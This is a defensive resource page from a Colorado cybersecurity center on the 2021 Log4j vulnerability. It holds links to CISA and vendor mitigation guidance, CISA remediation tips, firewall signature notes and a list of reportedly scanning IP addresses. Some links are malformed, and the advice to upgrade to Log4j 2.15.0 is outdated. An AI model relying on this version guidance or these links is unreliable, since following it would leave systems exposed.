Log4j Resources

The following is a list of ongoing resources to address the emerging log4j vulnerability. For ongoing discussions and updates, please consider joining the Colorado Threat Information Sharing group asap – https://colorado-crc.com/colorado-network/

Need to speak with Colorado experts? We can help put you in touch. Simply email us at Colorado-CRC@cyber-center.org

Key Resources

Apache Log4j Vulnerability Guidance | CISA

GitHub community page for vulnerability status and recommendations: https://github.com/cisagov/log4j-affected-db 

Report any attacks to: https://us-cert.cisa.gov/forms/report

Sign up for CISA’s free Cyber Hygiene vulnerability scanning services – email vulnerability_info@cisa.dhs.gov to start the process!

https://canarytokens.org/generate# (Use to monitor Log4l library instantiation when doing a DNS query)

https://github.commubix/CVE-2021-44228-Log4Shell-Hashes (Signatures for searching for the file)

https://securityblue.team/log4j-hunting-and-indicators/

https://www.randori.com/blog/cve-2021-44228/

https://wwww.lunasec.io/docs/blog/log4j-zero-day

Cloudflare WAF Blocks: https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

Citrix Web Application Firewall – Proven, Robust Security for your Web Applications – Solution Brief: https://www.citrix.com/content/dam/citrix/en_us/documents/solution-brief/citrix-web-application-firewall-proven-robust-security-for-your-web-applications.pdf

Citrix Guidance for Reducing Apache Log4j Vulnerability: https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/

Qradar: https://community.ibm.com/community/user/security/blogs/adam-frank/2021/12/13/detection-of-log4shell-using-qradar

https://www.trustedsec.com/blog/log4j-playbook/

CISA Tips

1. Scan your devices & applications to see if you are using Log4j version 2.0-beta 9 to 2.14.1 (Prioritize external applications & devices THEN internal applications and devices after you have address your external/Internet-facing applications)

2. Upgrade to version 2.15.0 as soon as possible

DO NOT QUIT at this point! Continue the following steps!

3. Make sure your Security Operations Center is actioning every single alert on devices that are or were running vulnerable Log4j versions

4. Make sure your web app firewalls are updated with the newest rules

5. Review your Change Control – because sophisticated actors may patch behind you

6. Lower the threshold for information sharing – If You See Something, Say Something!

7. Make sure your Cyber Hygiene request to CISA has been submitted – vulnerability_info@cisa.dhs.gov

  • Palo Alto Firewall IDS/IPS Tips

    • Palo released an emergency update (version 8499) on 12/10 containing the log4j signatures.  There was one more update released yesterday (version 8500).     For each policy that is created in Palo, there is an option to enable “Vulnerability Protection” which is customizable but should reset the critical threat connections by default.   In order for this to work for others, they would need the 8500 update, a valid Threat Prevention license, and Vulnerability Protection enabled on their policies. We think it looks at unencrypted traffic strings for the blocking.

  • CrowdStrike Tips

  • Fortinet Firewall IDS/IPS Tips

  • Additional IP Addresses That May be Scanning for Vulnerability Sent by a Colorado County

199.249.230.69

209.141.54.195

138.68.250.214

159.89.150.150

165.227.32.109

159.89.133.216

178.128.226.212

159.89.146.147

68.183.198.36

138.197.106.234

143.198.183.66

138.197.72.76

138.197.108.154

68.183.192.239

128.199.15.215

147.182.216.21

142.93.157.150

138.197.167.229

159.89.48.173

137.184.106.119

137.184.104.73

68.183.198.247